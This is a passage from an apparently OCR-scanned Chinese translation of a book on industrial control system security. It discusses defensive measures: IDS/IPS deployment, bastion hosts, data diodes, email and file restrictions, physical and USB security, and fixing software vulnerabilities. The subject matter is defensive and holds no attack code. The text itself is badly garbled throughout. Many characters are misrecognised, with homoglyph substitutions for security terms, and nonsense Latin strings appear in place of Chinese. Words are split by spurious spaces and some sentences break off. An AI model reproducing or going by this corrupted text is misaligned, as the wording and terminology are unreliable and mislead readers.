连接 ， 并 尝试 终止 或 拦截 该 连接 ， 然 后 将 其 行为 上 报 至 负 言 息 审查 的 分 析 员 们 。 传 统 的 1DS/IPS 部 署 方 式 如 图 10-1 所 示 。 正 如 在 IT 环 境 中 一 样 ， 在 控制 网 络 
中 部 署 IDS/IPS 有 益 于 网 络 安全 ， 因 此 同样 也 推荐 采用 这 种 部 署 方 式 。 但 是 ， 就 像 其 他 补救 类 控制 措施 一 样 ， 在 部 署 基于 这 类 技术 的 设备 时 也 要 格外 留神 。 
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互联 网 


入 侵 检 测 系 统 
与 人 侵 防 御 系 统 


图 10-1 ”传统 入 侵 检 测 系 统 与 入 侵 防 御 系 统 部 署 方式 


虽然 IDS 和 1PSs 在 对 抗 恶意 代码 时 发 挥 了 巨大 作用 ， 但 在 控制 系统 网 络 中 部 署 这 些 设备 也 会 存在 固有 风险 。 在 控制 系统 网 络 中 部 署 1DS/IPS 需 要 考虑 如 下 问题 : 
` IDS/IPS 厂 商 具 备 足够 丰富 的 知识 储备 来 为 工控 系统 协议 和 数据 传输 提供 支持 吗 ? 
当 对 控制 系统 网 络 流量 进行 主动 检查 时 ，IDS/IPS 如 何 运 行 ? 
- 在 为 额外 的 或 者 新 型 工控 系统 协议 和 控制 系统 网 络 数据 传输 提供 支持 时 ， 厂 商 的 路 线 图 是 怎样 设计 的 ? 


- 如 果 IDS/IPS 是 基于 主机 的 产品 ， 该 产品 如 何 对 人 机 界面 程序 、 实 时 历史 数据 库 系 统 等 流量 进行 处 理 ? 该 产品 能 够 理解 主机 上 所 应 用 的 协议 、 应 用 程序 以 及 
传输 机 制 吗 ? 


* 有 没有 数据 、 应 用 程序 或 者 网 络 白 名 单 可 以 应 用 ? 


在 工控 系统 环境 中 部 署 I1DS/IPS 时 ， 虽 然 上 述 问题 并 未 涵盖 所 有 需要 考虑 的 内 容 ， 但 是 它们 可 以 作为 非常 好 的 入 门 问 题 ， 帮 助理 解 在 控制 环境 中 部 署 方案 时 所 
存在 的 风险 。 


Osz 


Chris Sistrunk 是 工控 系统 网 络 监控 的 开创 者 之 一 。 我 们 强烈 推荐 订阅 他 的 博客 和 邮件 列表 来 获取 这 一 领域 最 前 沿 的 进展 


(https: //www.fireeye.com/blog/executive-perspective/2015/11/network_securitymon.html) o 
(4) RAFAL 


fel (Bastion Hosts) 就 是 设计 作为 “中 间 人 ”的 计算 机 ， 它 处 于 “被 保护 的 ” (安全 的 网 络 ) 与 “未 被 保护 的 ” (不 安全 的 系统 ) KAZI. (HE 
垒 主 机 和 工控 系统 堡 爸 主 机 之 间 和 存在 着 显著 的 差异 。 


CARMAN, SAF UURA RAS EIFe SK (Demilitarized Zone, DMZ) 面向 外 网 的 一 侧 。 堡 鸡 主 机 通常 只 安装 有 一 个 应 用 程序 ， 来 自 互 联网 
的 连接 只 能 访问 该 应 用 ， 而 安全 分 析 师 也 会 关闭 堡 垒 主机 上 未 用 到 的 端口 和 协议 。 堡 垒 主机 也 可 用 于 限制 对 企业 或 DMZ 环 境 的 远程 访问 。 但 是 ， 工 控 系 统 环境 中 
的 堡垒 主机 应 该 部 署 在 工控 系统 的 DMZ 环 境 中 (如 图 10-2 所 示 ) ， 并 且 是 唯一 一 台 可 以 访问 受 保护 的 控制 网 络 的 机 器 。 这 种 部 署 形式 有 时 也 称 之 为 跳板 机 


(jump server) 。 
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图 10-2 ”工控 系统 环境 中 的 一 种 保全 主机 网 络 拓扑 图 示例 


工控 系统 环境 内 的 堡垒 主机 通常 安装 的 是 Windows7 或 者 Windows Server 系 统 ， 用 于 实现 健壮 的 远程 管理 和 访问 。 虽 然 也 可 以 选用 其 他 版 本 的 操作 系统 ， 但 
是 鉴于 Windows 操 作 系 统 在 使 用 过 程 中 拥有 广泛 的 资料 可 以 查询 ， 以 及 存在 众多 应 用 提供 支持 ， 所 以 许多 系统 管理 员 还 是 会 选择 Windows 操 作 系统 。 


使 用 堡 驹 主机 的 优点 众多 。 首 先 ， 堡 驹 主机 可 以 进行 日 志 记 录 ， 这 样 一 旦 出 现 安全 事件 ， 就 有 一 个 中 心 位 置 可 以 对 日 志 记 录 进 行 审 查 。 另 外 ， 部 署 了 堡 侄 
机 之 后 ， 对 于 攻击 者 而 言 只 有 一 个 地 方 或 者 一 条 路 径 能 够 进入 到 受 保护 的 控制 网 络 环境 ， 因 此 理想 情况 下 能 够 阻止 攻击 者 对 控制 环境 的 入 侵 。 最 后 ， 堡 爸 主 机 中 
使 用 本 地 创建 的 或 者 Microsoft 活 动 目录 创建 的 特定 用 户 账户 ， 以 防止 任意 用 户 的 访问 。 


不 过 ， 由 于 堡 鸡 主 机 可 以 对 工控 系统 网 络 进行 访问 ， 因 此 还 有 一 些 因素 需要 考虑 在 内 。 在 工控 系统 网 络 中 部 署 堡垒 主机 虽然 能 够 市 来 很 多 安全 保障 ， 但 也 随 
之 市 来 了 一 些 特定 的 安全 隐患 。 其 中 第 一 个 问题 就 是 堡 驹 主机 所 拥有 的 访问 权限 问题 。 通 常 ， 堡 又 主 机 几乎 能 够 不 受 约束 地 实现 对 控制 网 络 的 访问 ， 能 够 执行 任 
意 命令 并 访问 任意 程序 。 此 外 ， 给 堡 驹 主机 打 补 丁 以 及 维护 堡 鸡 主 机 的 任务 藻 在 了 系统 管理 员 户 上。 虽然 从 技术 角度 来 看 这 没有 问题 ， 但 是 当 任 务 优先 级 友 生 冲 
突 时 ， 可 能 会 导致 系统 管理 员 下 于 对 堡 仅 主 机 的 补丁 修复 或 维护 。 最 后 ， 堡 垒 主机 所 处 的 物理 位 置 或 逻辑 位 置 同 样 也 是 个 值得 关注 的 问题 。 比 如 ， 如 果 堡 驹 主机 
所 在 的 物理 机 器 掉 线 或 宕 机 ， 那 么 对 工控 系统 网 络 的 逻辑 访问 束 会 中 断 ， 直 到 堡垒 主机 再 次 上 线 。 部 署 堡 双 主 机 时 还 需要 考虑 以 下 间 题 : 


当 堡 公 主机 不 可 达 或 没有 响应 时 ， 故 障 转移 计划 如 何 制订 ? 

> 如 何 对 堡垒 主机 进行 维护 ? 

- 堡垒 主机 由 谁 来 维护 ? 

保全 主机 的 补丁 修复 生命 周期 是 怎样 的 ? 

- 堡 牟 主机 应 该 拥有 怎样 的 工控 系统 网 络 访问 权限 ? 

- DMZ 区 或 [本 网 络 应 该 拥有 怎样 的 堡 全 主机 访问 权限 ? 

- 当 发 生 安 全 事件 对 堡垒 主机 产生 影响 时 ， 事 件 响 应 程序 是 怎样 的 ? 
(5) 单 向 网 天 


要 想 实现 对 工控 系统 与 中 网 络 之 间 信 息 流 的 控制 ， 既 可 以 使 用 定制 的 单 向 防火 墙 也 可 以 使 用 预先 构建 的 单 向 网 天 (通常 也 称 作 “数据 二 极 管 ”) ， 例 如 
Waterfall 安 全 公司 (http://www.waterfall-security.com/category/products/) 和 Owl 计 算 技 术 公 司 (http://www.owlcti.com/solutions.html) 所 生产 的 单 
向 网 关 。 顾 名 思 义 ， 单 向 网 关 (unidirectional gateways) 可 以 控制 信息 的 定向 流动 ， 就 好 像 管 道中 的 水 流 一 样 。 有 些 网 关 也 能 够 对 方向 进行 转换 ， 而 其 他 网 关 
则 只 允许 信息 向 相同 的 方向 流动 。 流 向 可 以 根据 预订 计划 或 者 配置 信息 中 的 设置 加 以 改变 。 对 类 似 于 单 向 网 关 的 设备 加 以 集成 时 ， 需 要 多 个 设备 在 处 理 程序 或 者 
配置 上 也 做 出 相应 的 调整 ， 虽 然 这 样 做 有 些 麻 烦 但 是 对 于 黑客 而 言 却 大 大 提高 了 攻击 难度 。 单 向 网 天 的 缺点 在于 ， 对 于 位 于 网 天 另 一 侧 的 设备 而 言 ， 即 便 能 够 对 
其 进行 管理 ， 难 度 也 比较 大 。 但 是 就 像 网 络 安全 领域 中 的 大 多 数 问题 一 样 ， 安 全 性 和 易 用 性 总 是 不 可 兼 得 。 找 出 自己 真正 需要 的 ， 以 及 不 可 或 缺 的 需求 是 解决 这 
一 问题 的 关键 所 在 。 单 向 网 关 是 实现 关键 系统 同 外 部 世界 之 间 物 理 隔离 的 一 种 非常 好 的 方法 (就 像 过 去 的 “air gap” 方 式 一 样 ) ， 同 时 还 能 保证 信息 能 够 进入 到 
企业 系统 之 中 。 


系统 管理 员 与 网 络 管理 员 需 要 共同 努力 解决 这 些 问 题 ， 从 而 限制 工控 系统 网 络 中 的 恶意 行为 。 这 样 做 虽然 会 降低 工作 效率 ， 但 是 就 像 在 钻井 平台 上 工作 的 机 
械 师 们 常 说 的 一 句 话 一 样 : 安全 第 一 是 真理 ， 工 作 慢 点 没关系 。 (It s better to work safe than to work fast.) 


(6) 电子 邮件 和 文件 的 访问 限制 


电子 邮件 和 文件 也 同样 是 潜在 的 攻击 向 量 。 如 果 工 控 系 统 网 络 中 的 用 户 可 以 收发 电子 邮件 ， 那 么 攻击 者 就 可 能 利用 邮件 绕 过 所 有 酷 炫 的 防火 墙 规则 。 不 久 
前 ,黑客 们 曾 针 对 一 家 德国 钢铁 厂 实施 了 鱼 叉 式 网 络 钓鱼 攻击 ， 并 将 一 个 极其 危险 的 恶意 软件 安装 在 了 钢铁 厂 的 系统 中 (https://ics.sans.org/media/ICS-CPPE- 
case-Study-2-German-Steelworks Facility.pdf) 。 如 果 有 人 单 击 了 附件 或 者 链接 ， 那 么 就 会 连接 到 一 个 恶意 网 站 ， 进 而 使 攻击 者 获得 工控 系统 网 络 中 的 一 个 立 


要 想 避 免 这 种 情况 的 发 生 ， 必 须 禁 止 工控 系统 网 络 中 的 所 有 机 器 执行 任何 不 必要 的 操作 。 如 果 有 人 想 查收 自己 的 邮件 ， 那 么 必须 使 用 业务 网 络 中 的 机 器 而 非 
工控 系统 网 络 中 的 机 器 。 这 样 的 规则 会 不 会 很 麻烦 ”当然 会 。 但 是 会 比 一 段 恶意 代码 导致 大 桶 化 学 品 的 泄漏 更 麻烦 吗 ” 你 说 呢 ? 


文件 同样 也 是 个 大 问题 。 通 过 下 载 、 外 部 磁盘 或 者 本 该 由 运营 人 员 使 用 的 FTP 服 务 器 等 方式 ， 文 件 可 以 进入 到 工控 系统 网 络 之 中 ， 而 黑客 利用 这 些 手段 却 可 以 
达到 其 他 不 可 告 人 的 目的 。 显 然 ， 随 便 什 么 文件 都 可 以 进入 到 工控 系统 网 络 中 是 非常 危险 的 。 最 起 码 ， 所 有 接触 过 非 工 控 系 统 主机 的 U 盘 在 向 工控 系统 网 络 传输 数 
据 乙 前 都 应 该 经 过 专用 反 病 毒 主机 的 扫 摘 。 而 专用 反 病 毒 主机 中 除了 反 病 毒 软件 外 不 应 该 再 安 疼 其 他 任何 软件 。 除 了 反 病 毒 扫描 ， 反 病毒 主机 也 不 应 该 再 用 于 其 
他 任何 用 途 。 专 用 反 病 毒 主机 的 部 署 有 两 种 理想 方式 ， 一 种 是 在 虚拟 机 中 运行 操作 系统 ， 而 操作 系统 定期 (每 日 ) 回 深 到 最 近 一 次 反 病毒 特征 库 更 新 的 状态 ; A 
一 种 则 是 定期 采用 镜像 重 装 整合 机 器 。 这 算 迫 害 妄 想 症 吗 ” 好 像 有 点 。 那 么 这 样 会 安全 吗 ?” 当 然 了 ! 有 助 于 实现 这 些 对 抗 措施 的 产品 包括 Sasa Software 公 司 的 
Gate Scanner 扫 摘 器 (http://www.sasa-software.com/) ， 以 及 OPSWAT 公 司 的 MetaScan 扫 描 器 (https://www.opswat.com/products/metascan) , 1% 
些 产 品 采用 多 种 技术 检测 有 恶意 代码 并 对 其 进行 清除 ， 从 而 极 大 地 降低 了 有 恶意 代码 感染 预防 工作 的 复杂 程度 。 


(7) 物理 环境 的 访问 限制 


媒体 甚至 是 安全 社区 都 将 注意 力 聚焦 于 软件 ， 这 使 得 人 们 可 能 志 记 了 还 有 另外 一 整套 攻击 向 量 需 要 注意 ， 那 就 是 物理 访问 。 如 果 黑 客 能 够 径直 走 到 PLC 跟 
前 ,将 网 线 直 接 插 在 console 口 上 ， 那 么 世界 上 所 有 的 防火 墙 、IDS 特 征 码 和 安全 编码 都 将 形同虚设 。 如 果 说 位 于 工控 系统 网 络 染 构 顶 部 的 防火 墙 可 以 保护 系统 免 
遭 来 目 网 络 世界 的 攻击 ， 那 么 门 锁 、 国 栏 和 其 他 传统 安防 机 制 则 可 以 看 作 是 在 以 构 底 部 对 系统 安全 进行 保护 ， 而 这 里 也 是 传感器 、 执 行 器 以 及 其 他 设备 所 在 的 地 
方 。 


想 一 想 黑客 们 仅仅 通过 物理 访问 融 可 能 对 日 弟 工 作 这 来 的 所 有 破坏 吧 。 他 们 可 以 让 传感器 报告 错误 的 数值 ; 他 们 可 以 导致 执行 器 停止 运转 ; 他 们 还 可 以 弄 坏 
管道 连接 处 的 螺栓 ， 导 致 管道 泄漏 或 破裂 。 如 果 用 户 能 想到 一 旦 坏人 把 东西 搞 坏 而 制造 出 的 种 种 麻烦 ， 那 就 需要 物理 安保 措施 来 保护 这 些 东 西 了 。 


需要 予以 保护 的 资产 所 处 的 位 置 在 很 大 程度 上 决定 了 其 所 需 的 保护 类 型 。 如 果 管 道 有 一 部 分 在 公共 区 域 的 地 面 上 ， 那 么 用 某 种 类 型 的 围栏 把 它 围 起 来 是 个 不 
错 的 主意 。 但 如 果 用 铁 刺 网 就 不 一 定 了 .….…. 这 取决 于 该 处 管道 可 能 遭受 的 损毁 程度 ， 以 及 这 上段 管道 的 重要 程度 是 否 值 得 采用 相应 的 保护 措施 。 (因为 使 用 铁 刺 网 的 
合法 性 因 地 而 异 ， 因 此 在 安装 铁 刺 网 之 前 最 好 先 查 阅 一 下 相关 的 法 律 条 文 来 以 防 万 一 。) 如 果 需 要 把 六 有 PLC 的 机 箱 置 于 室外 ， 那 么 一 把 用 断 线 钳 剪 不 断 、 开 锁 
技巧 也 打 不 开 的 、 结 实 的 锁 瓯 派 上 用 场 了 。 如 果 在 机 构 没有 所 有 权 的 场地 上 进行 微波 通信 ， 那 么 最 好 安 丢 摄像头 以 确保 对 视线 范围 内 的 所 有 情况 进行 监控 (并 做 


好 一 旦 摄像 头 被 长 时 间 遮 挡 的 应 急 方案 ) 。 如 果 在 房屋 边界 附近 有 WiFi 接 入 点 ， 则 需要 安装 定向 天 线 和 屏 菩 器 材 以 阻止 WiFi 信 号 流入 公共 区 域 ， 进 而 降低 黑客 通 
过 流量 动 持 进入 网 络 的 概率 。 


需要 进行 物理 保护 的 资产 不 仅仅 只 存在 于 公共 区 域 当中 ， 内 部 威胁 也 确实 存在 ， 而 其 所 市 来 的 风险 并 不 比 某 些 外 部 攻击 者 市 来 的 风险 小 。 不 过 应 当 注意 的 
是 ， 并 不 是 所 有 的 内 部 威胁 都 是 有 意 为 之 的 。 很 多 时 候 人 们 只 是 找 不 到 更 好 的 处 理 方式 。 (哎呀 ， 你 总 归 遇 到 过 几 个 这 样 的 同事 吧 ”) 对 于 完全 由 本 机 构 控制 的 
设备 也 应 该 予以 保护 ， 使 其 远离 破坏 者 和 不 知道 自己 在 做 什么 的 员工 。 需 要 限制 访问 的 设备 应 该 上 锁 ， 电 脑 机 箱 也 应 该 上 锁 并 配备 防 拆 开关 (tamper switch) 。 
当 防 拆 开 天 一 旦 被 打开 时 ， 根 据 预 先 设置 防 拆 开关 可 以 完成 从 通知 管理 员 到 探 除 硬盘 等 在 内 的 很 多 工作 。 


还 有 一 个 经 常 被 忽略 的 物理 安全 问题 就 是 接口 安全 ， 例 如 USB 接 口 。 使 用 USB 接 口 的 设备 往往 会 带 来 非常 严重 的 威胁 。 随 着 BadUSBIT 漏洞 利用 工具 的 出 
现 ，USB 设 备 可 以 采用 比 以 往 更 加 隐蔽 的 方式 将 恶意 代码 带 入 到 网 络 之 中 。BadUSB 的 隐蔽 性 在 于 恶意 代码 驻 留 在 USB 设 备 的 固件 当中 而 不 是 闪存 上 ， 此 时 反 病 毒 
程序 往往 会 忽视 对 固件 的 扫描 ， 从 而 错误 地 认为 USB 设 备 中 没有 恶意 代码 。 而 USB 设 备 一 旦 感染 ， 即 使 清空 格式 化 该 USB 设 备 也 无 法 完全 清除 恶意 代码 。 唯 一 避 
免 感染 的 可 靠 方 法 就 是 禁用 所 有 USB 接 口 。 正 如 前 文 所 提 到 的 ， 有 时 禁用 USB 接 口 并 不 是 一 个 好 的 选择 ， 而 是 由 于 操作 系统 的 局 限 性 所 导致 的 。 另 一 个 并 非 完 美 
的 替代 办 法 是 使 用 USB 接 口 拦截 器 (USB port blockers, http://www.amazon.com/Lindy-USB-Port-Blocker-Green/dp/BOOOI2JWJO) 。 这 些 方 法 都 可 以 从 
物理 上 阻止 将 USB 设 备 插入 到 系统 当中 。 虽 然 配备 合适 的 工具 再 假 以 时 日 ， 黑 客 们 总 是 能 够 找到 突破 这 些 方法 的 途径 ， 但 是 如 果 目 的 仅仅 是 防止 自己 人 使 用 可 能 
被 感染 的 USB 设 备 ， 那 么 上 面 提 到 的 方法 就 足够 做 到 这 一 点 了 ， 而 且 实 现 起 来 也 不 贵 。 


任何 一 个 看 过 谍 战 影片 的 人 都 知道 ， 门 棕 卡 是 防止 陌生 人 进入 限制 区 域 的 好 办 法 。 融 像 计算 机 系统 有 许多 不 同 级 别 的 用 户 权 限 一 样 ， 不 同 职员 对 办 公 区 域 的 
访问 权限 也 是 不 同 的 。 钥 匙 是 传统 的 安保 方案 ， 而 门禁 卡 和 RFID 射 频 识 别 卡 则 能 够 实现 更 为 精细 的 管控 。 显 然 ， 所 有 人 都 需要 通过 大 门 ， 但 是 前 台 接 待 员 却 几乎 
不 会 在 服务 器 机 房 附近 闲 泛 。 设 备 管理 员 (或 者 负责 设备 管理 的 团队 ) 应 该 担负 起 对 职员 和 访客 访问 任意 特定 区 域 进行 控制 和 管理 的 责任 。 不 同 的 区 域 应 该 根据 
不 同 级 别 的 限制 权限 加 以 隔离 ， 从 而 使 访问 过 程 简单 直接 ， 更 不 用 说 还 要 将 所 有 的 访问 过 程 记录 在 案 。 访 问 记录 应 该 包括 什么 区 域 要 求 什么 权限 ， 以 及 在 什么 情 
况 下 谁 可 以 (或 者 谁 不 可 以 ) 拥有 进入 这 些 区 域 的 权限 。 理 想 情 况 下 ， 不 同 区 域 出 入 口 的 进出 记录 应 该 留 底 备案 ， 这 样 做 的 原因 有 很 多 ， 最 起 码 在 法 律 上 访问 记 
录 是 无 法 否认 的 证 据 。 双 因子 认证 和 不 可 复制 的 门禁 卡 也 应 该 酌情 考虑 选用 。 


像 采 购 其 他 设备 一 样 ， 物 理 安 保 设 备 的 售 价 区 间 也 很 大 。 你 和 邻居 家 之 间 的 围栏 显然 会 比 大 型 监狱 的 围栏 要 便宜 ， 但 是 相 比 之 下 肯定 没有 后 者 牢固 。 同 样 
地 ， 用 在 健身 房 里 衣物 柜 的 密码 锁 也 要 比 银 行 里 保险 柜 的 密码 锁 要 便宜 得 多 ， 但 也 不 安全 得 多 。 在 资产 保护 方面 ， 需 要 在 接受 设备 被 修改 的 风险 与 为 了 保护 资产 
所 花费 的 成 本 之 间 进 行 权 稀 。 


2. 清 除 ( 移 除 ) 漏洞 


虽然 捉 弄 黑 客 非 党 好 玩 也 很 刺激 ， 但 是 我 们 的 最 终 目的 还 是 要 确保 系统 更 加 安全 ， 防 止 已 知 漏洞 被 攻击 者 加 以 利用 。 如 果 了 解 黑客 打算 如 何 利用 系统 中 的 漏 
洞 并 且 知 道 漏洞 利用 时 所 需 的 步骤 和 信息 ， 那 么 只 要 提高 执行 这 些 步骤 获取 相关 信息 的 难度 即 可 。 这 将 提高 对 系统 进行 未 授权 访问 所 需 专业 技术 水 平 的 门槛 ， 从 
而 能 够 将 一 些 水 平 较 低 的 黑客 拒 之 门 外 ， 但 也 会 担 使 高 水 平 的 黑客 们 寻找 其 他 路 径 进 行 入 侵 。 如 此 你 来 我 往 的 交锋 其 实 就 是 安全 轿 里 的 “游戏 ”。 不 过 ， 处 于 防 
御 位 置 的 一 方 通常 会 比较 难以 应 对 ， 因 为 防御 方 总 是 被 动 地 做 出 反应 ， 而 攻击 方 则 总 是 主动 地 故 起 攻击 。 正 如 在 格斗 技巧 中 经 音 提 到 的 ， 主 动 进攻 要 比 被 动 反 应 
更 快 。 所 以 要 想 先 于 攻击 者 做 出 反应 ， 安 全 人 员 融 必须 先 成 为 一 名 攻击 者 ， 并 且 在 真正 的 攻击 者 友 现 漏洞 之 前 修复 漏洞 。 


话 虽 如 此 ， 但 安全 对 策 也 不 完全 只 是 修复 各 种 各 样 的 漏洞 。 还 可 以 针对 关键 系统 应 用 各 种 标准 、 指 南 中 的 指导 原则 和 最 佳 实践 进而 防止 大 多 数 攻 击 。 本 章 将 
分 门 别 类 地 阐述 清除 漏洞 所 需要 的 各 种 技能 与 过 程 以 保障 安全 。 


工控 系统 设备 和 工控 系统 网 络 的 类 型 多 样 ， 实 现 起 来 也 很 复杂 。 对 大 型 系统 进行 分 类 的 方式 也 有 很 多 。 而 只 要 能 够 系统 化 地 涵盖 所 有 组 件 ， 那 么 这 种 分 类 方 
式 惑 能 够 在 现实 中 友 挥 作用 。 我 们 发 现 根据 专业 领域 进行 分 类 的 方式 对 于 现实 工作 具有 很 大 的 帮助 作用 ， 因 为 这 样 可 以 将 相关 问题 归 为 一 组 ， 然 后 交 由 具备 特定 
技术 水 平 的 人 员 来 解决 。 


下 面 是 几 种 比较 宽泛 的 分 类 : 
- 软件 修复 
- 系统 的 补丁 更 新 
+ 反 病 毒 软件 的 部 署 
` 不 安全 配置 的 修复 
(1) 软件 修复 


计算 机 忌 是 严格 地 按照 人 们 的 指令 工作 。 但 是 ， 当 人 们 向 计算 机 下 达 指 令 时 ， 通 常 不 是 那么 清晰 具体 。 这 就 是 为 什么 轧 会 存在 安全 漏洞 和 软件 漏洞 的 原因 。 
当 程 序 员 需 要 计算 机 完成 某 项 工作 ， 但 在 编程 实现 期 间 由 于 各 种 问题 导致 代码 实现 杂乱 无 章 、 逻 辑 混 乱 的 时 候 ， 那 么 就 会 出 现 问题 。 除 非 能 够 找到 由 计算 机 对 其 
他 计算 机 编程 的 方法 ， 才 能 对 软件 错误 做 出 预测 。 (当然 ， 如 果 一 台 计 算 机 真 的 能 对 其 他 计算 机 进行 编程 了 ， 我 想 我 会 头 一 个 抵制 这 些 计算 机 的 。《 终 结 者 》 电 
影 中 机 器 人 控制 人 类 的 剧情 还 没 看 够 吗 ? ) 


在 处 理 软件 问题 的 过 程 中 可 以 将 其 进一步 分 为 两 个 子 类 : 一 类 是 用 户 拥有 源 代码 的 软件 ， 这 种 软件 可 能 是 机 构 内 部 研发 的 或 是 开源 软件 ; 另 一 类 则 是 用 户 没 
有 源 代码 的 软件 。 当 用 户 由 于 使 用 的 软件 出 了 问题 而 嘲笑 软件 三 商 里 的 “那些 程序 员 采 瓜 ” 时 ， 必 须 注意 到 有 些 问题 是 程序 内 部 所 固有 的 而 并 非 人 为 市 来 的 。 为 
了 避免 伤害 研发 部 门 工 作 人 员 的 感情 ， 在 处 理 修 复 软件 问题 时 ， 按 照 有 无 源 代码 的 分 类 ， 可 以 有 两 套 截然 不 同 的 措施 。 


1) 有 源 代码 软件 的 处 理 


暂且 让 我 们 假设 用 户 希 望 加 固 的 一 段 程序 是 由 公司 内 部 人 员 所 开发 的 。 这 非常 好 ， 因 为 在 这 种 情况 下 用 户 (或 者 至 少 是 用 户 所 在 公司 的 研发 团队 ) 拥有 修复 
安全 漏洞 所 需 的 一 切 资源 。 但 不 幸 的 是 ， 复 杂 的 软件 即便 没有 上 百 万 行 代码 至 少 也 有 上 和 干 行 代码 。 找 到 问题 的 根源 可 能 需要 花费 不 少时 间 。 然 而 ， 这 一 过 程 必 不 
可 少 ， 而 且 在 这 种 情况 下 也 不 可 能 由 别人 来 完成 这 项 工作 。 


假设 安全 专家 们 已 经 友 现 并 为 研发 团队 指出 了 某 些 “可 能 不 太 安全 的 特性 ”， 那 么 研发 团队 就 需要 遵循 标准 的 缺陷 跟踪 流程 ， 将 存在 问题 的 代码 行 标注 出 

来 。 要 想 辨 别 出 存 在 问题 的 代码 ， 需 要 从 事 代码 调试 的 工作 人 员 了 解 安 全 问题 的 本 质 。 通 常 ， 对 待 “ 正 常 的 ”输入 时 ， 软 件 都 能 够 正常 运行 ， 但 是 软件 在 处 理 异 
常 输入 时 则 会 导致 某 些 地 方 出 现 错误 。 更 为 普遍 的 情况 是 ， 程 序 员 们 并 不 是 安全 专家 。 所 以 ， 在 开发 团队 中 最 好 至 少 能 够 有 一 名 人 员 拥 有 最 新 的 安全 编码 实践 经 
验 。 如 果 没 有 ， 那 么 整个 团队 就 应 该 熟 读 针 对 不 同 编 程 语言 的 CERT 安 全 编码 实践 
(https://www.securecoding.cert.org/confluence/display/seccode/SEI+CERT+Coding+Standards) 。 事 实 上 有 许多 种 不 同 的 方式 能 够 使 程序 崩溃 而 引发 
安全 漏洞 。 从 对 一 个 数据 类 型 进行 了 错误 的 处 理 ， 到 逻辑 问题 ， 再 到 大 小 差 一 错误 (off-by-one error) ， 可 能 导致 出 现 错误 的 原因 列表 还 可 以 更 长 ， 几 乎 任何 
原因 都 有 可 能 导致 程序 出 现 漏洞 。 前 文 提 到 的 CERT 链 接 是 一 个 了 解 漏洞 成 因 从 而 避免 在 开 上 有 过 程 中 引入 漏洞 的 展 好 开端 。 此 外 ， 模 糊 测试 〈 见 第 7 章 ) 也 应 该 成 
为 软件 测试 过 程 中 的 一 部 分 ， 并 且 在 单元 测试 、 集 成 测试 和 回归 测试 过 程 中 均 应 该 开展 模糊 测试 。 这 种 方式 能 够 避免 漏 掉 一 些 轧 蠢 、 隐 菩 的 漏洞 。 


如 果 不 愿意 等 待 渗透 测试 团队 找 出 内 部 研发 软件 的 所 有 安全 隐患 ， 那 么 研 友 团队 则 需要 做 好 下 面 两 件 事 。 一 是 一 次 性 就 把 事情 做 好 ， 但 是 正如 我 们 之 前 所 提 
到 过 的 ， 这 种 方法 听 起 来 简单 做 起 来 难 。 这 意味 着 从 事 代 码 开 友 的 工作 人 员 需 要 熟悉 各 种 不 同类 型 的 安全 漏洞 ， 既 需要 了 解 这 些 漏洞 通常 在 不 同 编 程 语 言 中 的 表 
现形 式 ， 也 需要 知道 如 何 避 免 出 现 漏洞 。 指 望 初级 程序 员 具 备 这 种 层次 的 专业 技术 水 平 很 可 能 不 太 现实 ,但 是 最 好 尽快 加 强 对 他 们 的 培训 以 弥补 这 块 短 板 。 


研发 团队 要 做 的 第 二 件 事 是 开展 聚焦 于 安全 性 的 代码 审计 。 如 果 时 间 条 件 不 允许 ， 那 么 至 少 让 安全 审计 工作 成 为 现 有 代码 审计 过 程 中 的 一 部 分 。 如 果 编 写 工 
控 系 统 软 件 的 研发 人 员 从 来 都 不 进行 代码 审计 ， 那 可 太 吓 人 了 ， 拜 托 请 赶 罕 开 始 吧 。 代 码 审 计 有 点 像 高 中 时 代 找 同学 帮 有 自己 修改 作文 ， 因 为 别人 的 眼睛 忌 是 雪亮 
的 。 此 外 ， 编 程 团队 中 也 应 该 有 不 同 层次 不 同 专业 领域 的 人 员 从 多 个 角度 进行 审计 。 参 与 审计 代码 的 人 数 越 多 ， 在 生产 代码 中 出 现 像 缓 冲 区 溢出 这 种 电 春 的 漏洞 


就 会 越 少 。 


即使 软件 是 由 第 三 方 团 队 开发 的 ， 只 要 拥有 源 代 码 ， 上 述 事情 也 是 可 以 做 到 的 。 从 某 些 角度 来 看 ， 这 种 形式 效果 可 能 更 好 ， 因 为 不 会 出 现代 码 开 有 友人 员 固 执 
己见 的 情况 。 而 从 另外 一 个 角度 来 看 ， 这 种 形式 效果 可 能 更 差 ， 因 为 机 构 中 可 能 没有 专业 人 士 来 从 事 这 一 工作 。 但 是 ,无 论 息 么 看 ,仍然 需 要 开展 渗透 测试 和 代 
码 审 计 。 对 于 开源 项 目 ， 可 以 受益 于 其 他 人 的 工作 ， 因 为 我 们 并 不 是 唯一 关心 软件 安全 性 与 可 靠 性 的 人 。 还 会 有 其 他 人 来 帮助 我 们 对 某 个 问题 进行 修复 ， 而 我 们 
只 需要 将 软件 升级 到 最 新 版 本 即 可 。 有 时 ， 我 们 有 能 力 等 得 起 开源 社区 修复 漏洞 所 耗费 的 时 间 。 但 是 其 他 时 候 ， 我 们 都 不 得 不 使 用 起 码 当前 还 在 正常 运行 的 关键 
软件 。 至 于 到 | 底 采 用 哪 种 方式 ， 则 需要 结合 具体 情况 具体 分 析 才 能 做 出 决定 。 


2) 黑 盒 情况 的 处 理 (没有 源 代码 软件 的 处 理 ) 


另外 一 个 场景 就 是 用 户 无 法 获得 源 代码 的 情况 。 用 户 只 是 从 厂商 手 里 购买 了 软件 ， 所 以 除了 提交 错误 报告 和 发 送 吐 槽 邮件 之 外 不 能 对 软件 做 任何 改动 。 那 
么 ， 用 户 至 少 应 该 始终 跟踪 与 该 软件 相关 的 最 新 漏洞 。 为 了 做 到 这 一 点 ， 需 要 在 机 构 中 安排 一 名 员工 ， 时 不 时 地 碍 看 漏洞 公告 列表 。 互 联网 上 有 很 多 这 样 的 公告 
列表 ， 如 果 用 户 身 在 工控 系统 领域 ， 那 么 ICS-CERT 就 是 其 中 一 个 最 重要 的 网 站 (https://ics-cert.us-cert.gov/advisories) 。 大 部 分 已 知 的 安全 漏洞 都 会 列 在 那 
里 。 


不 过 ， 值 得 注意 的 是 ， 当 一 个 漏洞 出 现在 ICS3-CERT 列 表 上 时 ， 说 明 广 商 意 识 到 这 个 问题 已 经 有 段 时 间 了 ， 并 且 已 经 上 友 布 了 补丁 。 这 样 做 的 原因 是 因为 在 帮助 
